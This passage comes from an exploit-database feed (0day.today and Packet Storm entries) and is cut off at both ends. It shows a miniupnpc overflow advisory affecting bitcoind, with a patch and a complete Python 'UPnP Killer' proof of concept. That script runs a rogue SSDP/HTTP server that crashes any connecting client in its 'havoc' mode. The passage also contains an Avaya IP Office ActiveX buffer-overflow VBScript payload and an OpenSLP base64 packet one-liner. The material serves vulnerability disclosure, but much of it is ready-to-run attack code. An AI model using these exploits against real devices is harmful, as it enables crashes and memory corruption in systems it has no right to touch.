STRING_DEREFERENCE_PROBABLYEXPLOITABLE_c0000005_bitcoind.exe!secp256k1_ecdsa_recover\r\nBUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_bitcoind!secp256k1_ecdsa_recover+1ea44f\r\nANALYSIS_SOURCE: UM\r\nFAILURE_ID_HASH_STRING: um:string_dereference_probablyexploitable_c0000005_bitcoind.exe!secp256k1_ecdsa_recover\r\n```\r\n \r\n#### D) bitcoind 0.14.1 (linux)\r\n \r\n```python\r\n#> src\\bitcoind -upnp -printtoconsole\r\n \r\npwndbg> bt\r\n#0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36\r\n#1 0x00007ffff6abe91e in getHTTPResponse () from /usr/lib/x86_64-linux-gnu/libminiupnpc.so.10\r\n#2 0x00007ffff6abed22 in ?? () from /usr/lib/x86_64-linux-gnu/libminiupnpc.so.10\r\n#3 0x00007ffff6abf12d in miniwget_getaddr () from /usr/lib/x86_64-linux-gnu/libminiupnpc.so.10\r\n#4 0x00007ffff6ac0f9e in UPNP_GetValidIGD () from /usr/lib/x86_64-linux-gnu/libminiupnpc.so.10\r\n#5 0x000055555560ee0b in ThreadMapPort () at net.cpp:1446\r\n#6 0x0000555555622e44 in TraceThread<void (*)()> (name=0x555555a81767 \"upnp\", func=0x55555560ed3a <ThreadMapPort()>) at util.h:218\r\n#7 0x0000555555689c4e in boost::_bi::list2<boost::_bi::value<char const*>, boost::_bi::value<void (*)()> >::operator()<void (*)(char const*, void (*)()), boost::_bi::list0> (this=0x5555561544c0, [email\u00a0protected]: 0x555555622dc2 <TraceThread<void (*)()>(char const*, void (*)())>, a=...) at /usr/include/boost/bind/bind.hpp:313\r\n#8 0x000055555568996a in boost::_bi::bind_t<void, void (*)(char const*, void (*)()), boost::_bi::list2<boost::_bi::value<char const*>, boost::_bi::value<void (*)()> > >::operator() (this=0x5555561544b8) at /usr/include/boost/bind/bind_template.hpp:20\r\n#9 0x00005555556896eb in boost::detail::thread_data<boost::_bi::bind_t<void, void (*)(char const*, void (*)()), boost::_bi::list2<boost::_bi::value<char const*>, boost::_bi::value<void (*)()> > > >::run (this=0x555556154300) at /usr/include/boost/thread/detail/thread.hpp:117\r\n#10 0x00007ffff753aaea in ?? () from /usr/lib/x86_64-linux-gnu/libboost_thread.so.1.55.0\r\n#11 0x00007ffff5c3a064 in start_thread (arg=0x7fffd97fa700) at pthread_create.c:309\r\n#12 0x00007ffff596f62d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111\r\n```\r\n \r\n \r\nMitigation / Workaround / Discussion\r\n-------------------------------------\r\n \r\n* update to miniupnpc-2.0.20170509.tar.gz\r\n* disable upnp\r\n* or apply the following patch (also see provided patch1.diff, patch2.diff)\r\n \r\n \r\n```diff\r\n--- a/miniupnpc/miniwget.c\r\n+++ b/miniupnpc/miniwget.c\r\n@@ -280,11 +280,11 @@ getHTTPResponse(int s, int * size, int * status_code)\r\n goto end_of_stream;\r\n }\r\n }\r\n- bytestocopy = ((int)chunksize < (n - i))?chunksize:(unsigned int)(n - i);\r\n+ bytestocopy = ((unsigned int)chunksize < (n - i))?chunksize:(unsigned int)(n - i);\r\n if((content_buf_used + bytestocopy) > content_buf_len)\r\n {\r\n char * tmp;\r\n- if(content_length >= (int)(content_buf_used + bytestocopy)) {\r\n+ if((unsigned int)content_length >= (content_buf_used + bytestocopy)) {\r\n content_buf_len = content_length;\r\n } else {\r\n content_buf_len = content_buf_used + bytestocopy;\r\n@@ -309,14 +309,14 @@ getHTTPResponse(int s, int * size, int * status_code)\r\n {\r\n /* not chunked */\r\n if(content_length > 0\r\n- && (int)(content_buf_used + n) > content_length) {\r\n+ && (content_buf_used + n) > (unsigned int)content_length) {\r\n /* skipping additional bytes */\r\n n = content_length - content_buf_used;\r\n }\r\n if(content_buf_used + n > content_buf_len)\r\n {\r\n char * tmp;\r\n- if(content_length >= (int)(content_buf_used + n)) {\r\n+ if((unsigned int)content_length >= (content_buf_used + n)) {\r\n content_buf_len = content_length;\r\n } else {\r\n content_buf_len = content_buf_used + n;\r\n@@ -336,7 +336,7 @@ getHTTPResponse(int s, int * size, int * status_code)\r\n }\r\n }\r\n /* use the Content-Length header value if available */\r\n- if(content_length > 0 && (int)content_buf_used >= content_length)\r\n+ if(content_length > 0 && content_buf_used >= (unsigned int)content_length)\r\n {\r\n #ifdef DEBUG\r\n printf(\"End of HTTP content\\n\");\r\n```\r\n \r\n \r\nNotes\r\n-----\r\n \r\n* Vendor acknowledgement / Miniupnp Changelog [5]\r\n* Thanks to the miniupnp project for providing a fixed version within ~1 week!\r\n* This research/disclosure was coordinated in cooperation with the ethereum foundation at ethereum.org. Thanks, it was a pleasure working with you!\r\n \r\n \r\nReferences\r\n----------\r\n \r\n [1] http://miniupnp.free.fr/\r\n [2] http://miniupnp.free.fr/files/\r\n [3] https://github.com/miniupnp/miniupnp/tree/master\r\n [4] https://github.com/miniupnp/miniupnp/blob/master/miniupnpc/miniwget.c#L236\r\n [5] http://miniupnp.free.fr/files/changelog.php?file=miniupnpc-2.0.20170509.tar.gz\r\n [6] https://github.com/miniupnp/miniupnp/commit/f0f1f4b22d6a98536377a1bb07e7c20e4703d229\r\n \r\n \r\nContact\r\n-------\r\n \r\n https://github.com/tintinweb\r\n \r\n \r\n \r\n \r\n \r\n#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n# Author : <github.com/tintinweb>\r\n###############################################################################\r\n#\r\n# FOR DEMONSTRATION PURPOSES ONLY!\r\n#\r\n###############################################################################\r\n#\r\n# gdb --args ./upnpc-static -u http://192.168.2.110:5200/xxxx.xml -d -s <- segfault\r\n#\r\nimport socket\r\nimport struct\r\nimport logging\r\nimport threading\r\n__version__ = 0.3\r\n \r\nlogger = logging.getLogger(__name__)\r\n \r\n \r\nSCENARIO_CRASH_LARGE_MEMCPY = 1 # crash in memcpy with access violation READ (large memcpy)\r\nSCENARIO_CRASH_REALLOC_NULLPTR = 2 # miniupnpc <= v1.8 did not catch realloc errors\r\nSCENARIO_CRASH_1_BYTE_BUFFER = 3 # crash in memcpy overwriting heap (more likely crashing in read)\r\nSELECT_SCENARIO = SCENARIO_CRASH_LARGE_MEMCPY # default\r\n \r\n \r\nclass HttpLikeMessage(object):\r\n \"\"\"\r\n Builds and parses HTTP like message structures.\r\n \"\"\"\r\n linebrk = '\\r\\n'\r\n \r\n def __init__(self, raw):\r\n self.raw = raw\r\n self.header = self.request = self.method = self.path = self.protocol = self.body = None\r\n self.parse_fuzzy_http(raw)\r\n \r\n def startswith(self, other):\r\n return self.raw.startswith(other)\r\n \r\n def parse_fuzzy_http(self, data):\r\n data = data.replace('\\r', '')\r\n try:\r\n head, self.body = data.split(\"\\n\\n\", 1)\r\n except ValueError:\r\n # no body\r\n self.body = ''\r\n head = data\r\n \r\n try:\r\n head_items = head.strip().split('\\n')\r\n self.request = head_items.pop(0)\r\n self.method, self.path, self.protocol = self.request.split(\" \")\r\n \r\n self.header = {}\r\n for k, v in (line.strip().split(':', 1) for line in head_items if head.strip()):\r\n self.header[k.strip()] = v.strip()\r\n except Exception, e:\r\n logger.exception(e)\r\n e.msg = data\r\n raise e\r\n \r\n def serialize(self):\r\n lines = [self.request, ]\r\n lines += ['%s: %s' % (k, v) for k, v in self.header.iteritems()]\r\n return self.linebrk.join(lines) + self.linebrk * 2 + self.body\r\n \r\n def __str__(self):\r\n return self.serialize()\r\n \r\n def __repr__(self):\r\n return \"<%s msg=%r header=%r body=%r>\" % (self.__class__.__name__,\r\n (self.method, self.path, self.protocol),\r\n self.header,\r\n self.body)\r\n \r\n \r\nclass UPnPListener(object):\r\n def __init__(self, group=\"239.255.255.250\", port=1900):\r\n self.group, self.port = group, port\r\n self.callbacks = {}\r\n # multicast socket\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n logger.debug(\"[SSDP] bind: 0.0.0.0:%s\" % port)\r\n sock.bind(('0.0.0.0', port))\r\n mreq = struct.pack(\"=4sl\", socket.inet_aton(group), socket.INADDR_ANY)\r\n logger.debug(\"[SSDP] add membership: UDP/%s\" % group)\r\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\r\n self.listening = False\r\n self.sock = sock\r\n self.devices = {}\r\n \r\n # Start listening\r\n def listen(self):\r\n self.listening = True\r\n \r\n # Hint: this should be on a thread ;)\r\n logger.debug(\"[SSDP] listening...\")\r\n while self.listening:\r\n try:\r\n # Grab a large wad of data\r\n data, peer = self.sock.recvfrom(10240)\r\n data = data.decode(\"utf-8\")\r\n msg = HttpLikeMessage(data)\r\n # msg = HttpLikeMessage(self.sock.recv(10240).decode('utf-8'))\r\n logger.debug(\"[<-----] %r\" % msg)\r\n \r\n # execute callback if available\r\n cb = self.callbacks.get(msg.method, None)\r\n cb and cb(self, msg, peer)\r\n except Exception, e:\r\n logger.exception(e)\r\n \r\n # Register the uuid to a name -- as an example ... I put a handler here ;)\r\n def register_device(self, name=\"\", uuid=\"\"):\r\n logger.debug(\"%s; %s\" % (name, uuid))\r\n if name == \"\" or uuid == \"\":\r\n logger.error(\"[SSDP] Error registering device, check your name and uuid\")\r\n return\r\n \r\n # Store uuid to name for quick search\r\n self.devices[uuid] = name\r\n \r\n def register_callback(self, name, f):\r\n logger.debug(\"[SSDP] add callback for %r : %r\" % (name, f))\r\n self.callbacks[name] = f\r\n \r\n \r\nclass BadHttpServer(threading.Thread):\r\n def __init__(self, bind, filter=None):\r\n threading.Thread.__init__(self)\r\n self.bind = bind\r\n self.filter = filter\r\n \r\n def __repr__(self):\r\n return \"<%s bind=%s>\" % (self.__class__.__name__,\r\n repr(self.bind))\r\n \r\n def run(self, ):\r\n self.listen(filter=self.filter)\r\n \r\n def listen(self, filter=None):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n logger.info(\"[HTTP] bind %s:%d\"%self.bind)\r\n sock.bind(self.bind)\r\n # Listen for incoming connections\r\n sock.listen(1)\r\n \r\n while True:\r\n # Wait for a connection\r\n logger.info(\"[HTTP] waiting for connection\")\r\n connection, client_address = sock.accept()\r\n \r\n try:\r\n if filter and client_address[0] not in filter:\r\n raise Exception(\"[HTTP] wait for different client: %s!=%s\" % (client_address[0], filter))\r\n logger.info(\"[ ] connection from: %s\" % repr(client_address))\r\n \r\n chunks = []\r\n # TODO refactor crappy code\r\n while True:\r\n data = connection.recv(1024 * 8)\r\n if not data:\r\n break\r\n chunks.append(data)\r\n if data.endswith(\"\\r\\n\\r\\n\"):\r\n break\r\n logger.debug(data)\r\n self.handle_request(client_address, connection, HttpLikeMessage(''.join(chunks)))\r\n except Exception, e:\r\n logger.warning(repr(e))\r\n finally:\r\n # Clean up the connection\r\n connection.close()\r\n \r\n def send(self, client, connection, chunks):\r\n \"\"\"\r\n \r\n :param client:\r\n :param chunks:\r\n :param connection:\r\n :return:\r\n \"\"\"\r\n template = \"\"\"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\"\"\"\r\n ans = HttpLikeMessage(template)\r\n if len(chunks) == 1:\r\n length, data = chunks[0]\r\n ans.header[\"Content-Length\"] = length or len(data)\r\n ans.body = data\r\n else:\r\n ans.header[\"Transfer-Encoding\"] = \"chunked\"\r\n body = []\r\n for chunk in chunks:\r\n length, data = chunk\r\n body.append(\"%x%s%s%s\" % (length or len(data), ans.linebrk, data, ans.linebrk))\r\n body.append(\"0\")\r\n ans.body = ''.join(body)\r\n if SELECT_SCENARIO==SCENARIO_CRASH_LARGE_MEMCPY:\r\n ans.header[\"Content-Length\"] = len(ans.body)\r\n elif SELECT_SCENARIO==SCENARIO_CRASH_1_BYTE_BUFFER:\r\n # memcpy 0x80000000+x bytes to a buffer of 1 byte size.\r\n ans.header[\"Content-Length\"] = 1 # forces a realloc of 1 byte\r\n else:\r\n # realloc with 0x7fffffff, memcpy n=chunk_size:0x80000000+x - crashes if realloc fails\r\n ans.header[\"Content-Length\"] = 0x7fffffff # forces a realloc of x bytes\r\n \r\n connection.sendall(str(ans))\r\n logger.debug(str(ans))\r\n logger.warning(\"[----->] BOOM! payload delivered! - [to:%r] %r\" % (client, ans))\r\n \r\n def handle_request(self, client, connection, msg):\r\n if False and \"AddPortMapping\" not in str(msg):\r\n chunks = [(None, \"<>\")]\r\n else:\r\n if SELECT_SCENARIO==SCENARIO_CRASH_LARGE_MEMCPY:\r\n chunks = [(None, \"<xml>BOOM</xml>\"), (0x80000000, \"A\" * 9000), (None, \"bye\")]\r\n elif SELECT_SCENARIO==SCENARIO_CRASH_1_BYTE_BUFFER:\r\n chunks = [(None, \"<xml>BOOM</xml>\"), (0x80000000 - 1 + 15, \"A\" * 9000), (None, \"bye\")]\r\n else:\r\n chunks = [(None, \"<xml>BOOM</xml>\"), (0x80000000-1+15, \"A\" * 9000), (None, \"bye\")]\r\n self.send(client, connection, chunks)\r\n \r\n \r\ndef main():\r\n #from optparse import OptionParser\r\n import argparse\r\n global SELECT_SCENARIO\r\n SELECT_SCENARIO = SCENARIO_CRASH_LARGE_MEMCPY # crash with a large memcpy\r\n # SELECT_SCENARIO = SCENARIO_CRASH_REALLOC_NULLPTR # crash with a memcpy to nullptr due to realloc error (miniupnpc v1.8)\r\n # SELECT_SCENARIO = SCENARIO_CRASH_1_BYTE_BUFFER\r\n \r\n logging.basicConfig(format='[%(filename)s - %(funcName)20s() ][%(levelname)8s] %(message)s',\r\n loglevel=logging.DEBUG)\r\n logger.setLevel(logging.DEBUG)\r\n \r\n usage = \"\"\"poc.py [options]\r\n \r\n example: poc.py --listen <your_local_ip>:65000 [--havoc | --target <ip> [<ip>..]]\r\n \r\n \"\"\"\r\n #parser = OptionParser(usage=usage)\r\n parser = argparse.ArgumentParser(usage=usage)\r\n parser.add_argument(\"-q\", \"--quiet\",\r\n action=\"store_false\", dest=\"verbose\", default=True,\r\n help=\"be quiet [default: False]\")\r\n parser.add_argument(\"-l\", \"--listen\", dest=\"listen\",\r\n help=\"local httpserver listen ip:port. Note: 0.0.0.0:<port> is not allowed. This ip is being used \"\r\n \"in the SSDP response Location header.\")\r\n parser.add_argument(\"-u\", \"--usn\",\r\n dest=\"usn\", default=\"uuid:deadface-dead-dead-dead-cafebabed00d::upnp:rootdevice\",\r\n help=\"Unique Service Name. \")\r\n parser.add_argument(\"-t\", \"--target\", dest=\"target\",\r\n default=[], nargs='*',\r\n help=\"Specify a list of client-ips to attack. Use --havoc to attempt to crash all clients.\")\r\n parser.add_argument(\"-z\", \"--havoc\",\r\n action=\"store_true\", dest=\"havoc\", default=False,\r\n help=\"Attempt to attack all clients connecting to our http server. Use at your own risk.\")\r\n \r\n options= parser.parse_args()\r\n if not options.verbose:\r\n logger.setLevel(logging.INFO)\r\n if not options.havoc and not options.target:\r\n parser.error(\"No target specified. Use --havoc to attack all devices or --target <ip> to attack specific ips.\")\r\n \r\n if options.havoc:\r\n options.target = None\r\n if not options.listen :\r\n parser.error(\"missing mandatory option --listen <ip>:<port>\")\r\n options.listen = options.listen.strip().split(\":\")\r\n options.listen = (options.listen[0], int(options.listen[1]))\r\n if \"0.0.0.0\" in options.listen[0]:\r\n parser.error(\"0.0.0.0 not allowed for --listen\")\r\n \r\n logger.info(\"\"\"\r\n \r\n \r\n _ _ _____ _____ _____ _____\r\n / |/ | | | | _ | | | _ | ___ ___ _____ ___ ___ ___\r\n / // / | | | __| | | | __| _ _ _ | | . | | | . | _| -_|\r\n|_/|_/ |_____|__| |_|___|__| |_|_|_| |_|_|___| |_|_|_|___|_| |___\r\n \r\n //github.com/tintinweb\r\n \r\n \r\n [mode ] %s\r\n [listen] %s (local http server listening ip)\r\n [usn ] %s\r\n \"\"\"%(\"<img draggable=\"false\" class=\"emoji\" alt=\"\u26a1\" src=\"https://s.w.org/images/core/emoji/2.3/svg/26a1.svg\"> havoc (targeting any incoming client)\" if options.havoc else \" filter (targeting %r)\"%options.target,\r\n \"%s:%d\"%options.listen,\r\n options.usn))\r\n \r\n webserver = BadHttpServer(options.listen, options.target)\r\n logger.debug(\"spawning webserver: %r\" % webserver)\r\n webserver.start()\r\n \r\n def handle_msearch(upnp, msg, peer):\r\n # logger.info(\"MSEARCH! - %r\" % msg)\r\n # build answer\r\n # template = \"\"\"NOTIFY * HTTP/1.1\r\n template = \"\"\"HTTP/1.1 200 OK\r\nUSN: <overridden>\r\nNTS: ssdp:alive\r\nSERVER: <overridden>\r\nHOST: 239.255.255.250:1900\r\nLOCATION: <overridden>\r\nCACHE-CONTROL: max-age=60\r\nNT: upnp:rootdevice\"\"\"\r\n ans = HttpLikeMessage(template)\r\n ans.header[\"USN\"] = options.usn + msg.header[\"ST\"]\r\n ans.header[\"SERVER\"] = \"UPnP Killer/%s\" % __version__\r\n ans.header[\"LOCATION\"] = \"http://%s:%d/xxxx.xml\" % webserver.bind\r\n ans.header[\"ST\"] = msg.header[\"ST\"]\r\n ans.header[\"EXT\"] = \"\"\r\n \r\n logger.debug(\"[----->] sending answer: %s\" % repr(ans))\r\n # upnp.sock.sendto(str(ans), (upnp.group, upnp.port))\r\n upnp.sock.sendto(str(ans), peer)\r\n \r\n def handle_notify(upnp, msg, peer):\r\n # logger.info(\"NOTIFY! %r\" % msg)\r\n pass\r\n \r\n upnp = UPnPListener()\r\n upnp.register_callback(\"M-SEARCH\", handle_msearch)\r\n upnp.register_callback(\"NOTIFY\", handle_notify)\r\n upnp.listen()\r\n logger.info(\"--end--\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/29439", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T05:12:45", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2017-11-05T00:00:00", "published": "2017-11-05T00:00:00", "href": "https://0day.today/exploit/description/28956", "id": "1337DAY-ID-28956", "title": "Avaya OfficeScan (IPO) Remote ActiveX Buffer Overflow Exploit", "type": "zdt", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\t\r\n\r\n\r\nVendor:\r\n=============\r\nwww.avaya.com\r\n\r\n\r\n\r\nProduct:\r\n===========\r\nAvaya IP Office (IPO) \r\nv9.1.0 - 10.1\r\n\r\nIP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.\r\nFor businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and\r\nreduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide\r\nimproved customer service, and keep mobile employees accessible.\r\n\r\nProvides a hybrid PBX with TDM and IP telephony and trunk support.\r\nProvides IP routing, switching and firewall protection, between LAN and WAN (LAN2).\r\n\r\nIn addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.\r\nIncludes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).\r\n\r\nAvailable editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.\r\n\r\n\r\n\r\nVulnerability Type:\r\n====================\r\nActiveX Remote Buffer Overflow\r\n\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-12969\r\nASA-2017-313\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\nViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary\r\nattacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered.\r\n\r\nClsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}\r\nSafe for Script: False\r\nSafe for Init: False\r\n\r\nACCESS_VIOLATION\r\n8C4A77 MOV EAX,[ECX]\r\n\r\nSEH Chain:\r\n-----------\r\n1 8D00A3 po.dll\r\n2 36A7E95 CIPElements.dll\r\n3 36A8115 CIPElements.dll\r\n4 788719 ViewerCtrl.OCX\r\n5 788533 ViewerCtrl.OCX\r\n6 78862A ViewerCtrl.OCX\r\n7 6008793E mfc90u.dll\r\n8 60089B31 mfc90u.dll\r\n9 779858C5 ntdll.dll\r\n\r\n\r\n(d360.1040c): Access violation - code c0000005 (first/second chance not available)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll - \r\neax=0608ec18 ebx=00000000 ecx=00000000 edx=00000000 esi=0aa7bdd0 edi=0aa7bdd0\r\neip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246\r\npo!cip::po::SpecialObjects::getPresetObject+0x77:\r\n06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????\r\n0:008> !load winext/msec\r\n0:008> !exploitable\r\n\r\n!exploitable 1.6.0.0\r\n*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - \r\n\r\nExploitability Classification: PROBABLY_EXPLOITABLE\r\n\r\nRecommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at \r\npo!cip::po::SpecialObjects::getPresetObject+0x0000000000000077 (Hash=0x6f1f914b.0xc46b7285)\r\n\r\nThe data from the faulting address is later used as the target for a branch.\r\n\r\n\r\nReferences:\r\n==============\r\nhttps://downloads.avaya.com/css/P8/documents/101044091\r\n\r\n\r\nExploit/POC:\r\n=============\r\n\r\n<object classid='clsid:27F12EFD-325D-4907-A2D2-C38A2B6D3334' id='victim' />\r\n\r\n<script language='vbscript'>\r\nvictimFile = \"C:\\Program Files (x86)\\Avaya\\IP Office Contact Center\\User Interface\\ViewerCtrl.ocx\"\r\nprototype = \"Function open ( ByVal containerId As String ) As Long\"\r\nmemberName = \"open\"\r\nprogid = \"ViewerCtrlLib.ViewerCtrl\"\r\nargCount = 1\r\npayload=String(5142, \"A\")\r\n\r\nvictim.open payload\r\n\r\n</script>\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28956"}], "packetstorm": [{"lastseen": "2018-11-10T02:18:49", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "PACKETSTORM:150240", "href": "https://packetstormsecurity.com/files/150240/OpenSLP-2.0.0-Out-Of-Bounds.html", "title": "OpenSLP 2.0.0 Out-Of-Bounds", "type": "packetstorm", "sourceData": "` _ _ \n/ | ___ ___ ___ ___ ___| |___ \n_ / / | . | . | -_| |_ -| | . | \n|_|_/ |___| _|___|_|_|___|_| _| \n|_| |_| \n \n2018-11-07 \n \nMORE BUGS IN OPENSLP-2.0.0 \n========================== \n \nI discovered some bugs in openslp-2.0.0 back in January, 2018. \nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), \nand today I'm disclosing two more. \n \n \nBUG 1 \n===== \n \nThis issue is an OOB read that does not crash the application. \nSo in terms of exploitation it is not very interesting. If that's what \nyou're here for then scroll down to bug#2. \nAfter the occurence of the bug the application actually detects the error \nand ignores the malicious packet. Therefore, it could be argued that this \nis not a bug at all. Nevertheless, here it is: \n \nProof of concept exploit: \n \necho -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==27968== Invalid read of size 1 \n==27968== at 0x412436: GetUINT16 (slp_message.c:63) \n==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) \n==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) \n==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd \n==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) \n==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) \n==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n \nAnalysis: \n \nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes \nare read from the packet and interpreted as integers used as length fields. \nOne of them is the scopelistlen, parsed on line 321, and further used as \nargument for the amount of bytes to increment the buffer->curpos pointer \nin the the GetStrPtr function, shown below on line 112. It now points to \nuninitialized memory. \n \nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \npointer is dereferenced. \n \nSubsequently the comparison on line 329 evaluates to true since the \nbuffer->curpos now points to memory located after the buffer->end \npointer. The application therefore stops processing the malicious packet. \n \n291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg) \n292 { \n293 int result; \n294 \n295 /* 0 1 2 3 \n296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 \n297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n298 | <URL-Entry> \\ \n299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n300 | length of service type string | <service-type> \\ \n301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n302 | length of <scope-list> | <scope-list> \\ \n303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n304 | length of attr-list string | <attr-list> \\ \n305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\ \n307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ \n308 \n309 /* Parse the <URL-Entry>. */ \n310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry); \n311 if (result != 0) \n312 return result; \n313 \n314 /* Parse the <service-type> string. */ \n315 srvreg->srvtypelen = GetUINT16(&buffer->curpos); \n316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen); \n317 if (buffer->curpos > buffer->end) \n318 return SLP_ERROR_PARSE_ERROR; \n319 \n320 /* Parse the <scope-list> string. */ \n321 srvreg->scopelistlen = GetUINT16(&buffer->curpos); \n322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen); \n323 if (buffer->curpos > buffer->end) \n324 return SLP_ERROR_PARSE_ERROR; \n325 \n326 /* Parse the <attr-list> string. */ \n327 srvreg->attrlistlen = GetUINT16(&buffer->curpos); \n328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen); \n329 if (buffer->curpos > buffer->end) \n330 return SLP_ERROR_PARSE_ERROR; \n \n54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word. \n55 * \n56 * @param[in,out] cpp - The address of a pointer from which to extract. \n57 * \n58 * @return A 16-bit unsigned value in native format; the buffer pointer \n59 * is moved ahead by 2 bytes on return. \n60 */ \n61 uint16_t GetUINT16(uint8_t ** cpp) \n62 { \n63 uint16_t rv = AS_UINT16(*cpp); \n64 *cpp += 2; \n65 return rv; \n66 } \n... \n96 /** Extract a string buffer address into a character pointer. \n97 * \n98 * Note that this routine doesn't actually copy the string. It only casts \n99 * the buffer pointer to a character pointer and moves the value at @p cpp \n100 * ahead by @p len bytes. \n101 * \n102 * @param[in,out] cpp - The address of a pointer from which to extract. \n103 * @param[in] len - The length of the string to extract. \n104 * \n105 * @return A pointer to the first character at the address pointed to by \n106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes \n107 * on return. \n108 */ \n109 char * GetStrPtr(uint8_t ** cpp, size_t len) \n110 { \n111 char * sp = (char *)*cpp; \n112 *cpp += len; \n113 return sp; \n114 } \n \n \nProof of discovery: \n \n$ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum \n0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 - \n \ntwitter.com/magnusstubman/status/953909628622069760 \n \n \nPatch: \n \nI'm not aware of any patch, and I'm not 